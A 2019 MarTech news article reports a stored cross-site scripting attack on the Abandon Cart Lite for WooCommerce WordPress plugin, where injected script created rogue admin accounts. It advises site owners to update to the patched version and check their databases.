Martech: Martech is Marketing Logo
  • Topics
    Digital Transformation
    Marketing Operations
    Data
    Customer & Digital Experience
    Performance Marketing
    Marketing Management
    Special Reports
    All Topics
  • Conference
  • Webinars
  • Intelligence Reports
  • White Papers
  • What is MarTech

Processing...Please wait.

MarTech » Performance Marketing » WordPress plugin to win back cart abandoners leaves sites open to attack

WordPress plugin to win back cart abandoners leaves sites open to attack

Plugin maker has issued a patch. Site owners cautioned to update their sites and carefully review their databases for possible script injections.

Ginny Marvin on March 12, 2019 at 1:33 pm | Reading time: 3 minutes

A vulnerability in a WordPress plugin has left e-commerce sites vulnerable, according to a report Monday from Defiant, makers of a WordPress firewall plugin.

What caused the vulnerability? The report says hackers are targeting the Abandon Cart Lite for WooCommerce plugin, which is currently installed on more than 20,000 sites. The plugin aims to help sites using WooCommere win back users who abandoned their carts by sending them automated email notifications. The attackers are taking advantage of a stored cross-site scripting (XSS) flaw in the plugin.

How does it work? To infect and take over the sites, hackers added items to a cart, entered fake contact information in the checkout fields and injected malicious JavaScript with a bit.ly link in the “billing last name” field before abandoning the cart. The JavaScript then executes once an administrator logs in to view the list of abandoned carts in their WordPress dashboard.

The code enables two back doors to the site. One lets the hacker create an admin account named “woousers” on the site. The other lists all of the site’s plugins and looks for one that’s been disabled in order to create a backup back door in case the admin deletes the “woouser” account.

What’s being done? The plugin’s maker, Tyche Softwares, learned about the issue from user reports on the WordPress user forum and released a patched version — 5.2.0. If you’re using this plugin, be sure you’ve updated to the current 5.2.0 version and carefully review previous submissions in the database. The latest version also scans for the email address that was registered with the malicious “woouser” account and will delete that user if found.

Unknown vulnerability. “It’s also hard to tell how many successful XSS injections are sitting around waiting for an admin to open that page for the first time,” researcher and report author Mikey Veenstra told ZDNet, which first covered the attack. Veenstra also said that many unwitting sites might have already been attacked but haven’t seen any effects because the exploit hasn’t executed yet.

Why you should care. This is a good reminder that site vulnerabilities can come from many angles. It’s not clear how many sites have been infected or how the hackers were using the exploited sites. The report cautions site owners that the patch does not address the exploit occurring on inactive plugins and also warns that “the nature of the initial XSS payload allows the email address of newly created rogue admins to be changed with very little effort.” In other words, the initial “woouser” name could have be changed to something else and remain undetected.

This story first appeared on Marketing Land. For more on digital marketing, click here.


Opinions expressed in this article are those of the guest author and not necessarily MarTech. Staff authors are listed here.


New on MarTech

    Webinar: The key to email marketing success
    The FTC weighs in on customer data privacy
    Whatever happened to customer journey orchestration?
    The latest jobs in martech
    B2B buyers are much more concerned about a company’s values than the general public

About The Author

Ginny Marvin
Ginny Marvin was formerly Third Door Media’s Editor-in-Chief, running the day-to-day editorial operations across all publications and overseeing paid media coverage. Ginny Marvin wrote about paid digital advertising and analytics news and trends for Search Engine Land, Marketing Land and MarTech Today. With more than 15 years of marketing experience, Ginny has held both in-house and agency management positions. She can be found on Twitter as @ginnymarvin.

Related Topics

Performance Marketing

Get the daily newsletter digital marketers rely on.

Processing...Please wait.

See terms.

ATTEND OUR EVENTS The MarTech Conference logo.

September 28-29, 2022: Fall

Start Training Now: Master Classes

Start Discovering Now: Spring



The SMX Conference logo.

Start Training Now:: SMX Advanced

November 14-15, 2022: SMX Next

March 8-9, 2022: Master Classes

Webinars

Tracking Growth From Organic Search

Beyond the Buzzword: Transform Digitally to Drive Organic & SEO Growth

Leap or Linger: Determining Which Ad Platforms to Test for Your B2B Brand

See More Webinars
Intelligence Reports

Enterprise Marketing Performance Management Platforms: A Marketer’s Guide

Enterprise Customer Journey Orchestration Platforms: A Marketer’s Guide

Enterprise Account-Based Marketing Platforms: A Marketer’s Guide

See More Intelligence Reports
Featured White Paper

The CMO’s Formula To 3x Your Digital Marketing Campaign Results

See More Whitepapers
Search Our Site

Receive daily marketing news & analysis.

Processing...Please wait.

Topics

  • Transformation
  • Operations
  • Data
  • Experience
  • Performance
  • Management
  • All Topics
  • Home

Our Events

  • MarTech
  • Search Marketing Expo - SMX

About

  • What is MarTech
  • Contact
  • Privacy
  • Terms Of Use
  • Marketing Opportunities
  • Staff

Follow Us

  • Facebook
  • Twitter
  • LinkedIn
  • Newsletters
  • RSS

© 2022 Third Door Media, Inc. All rights reserved.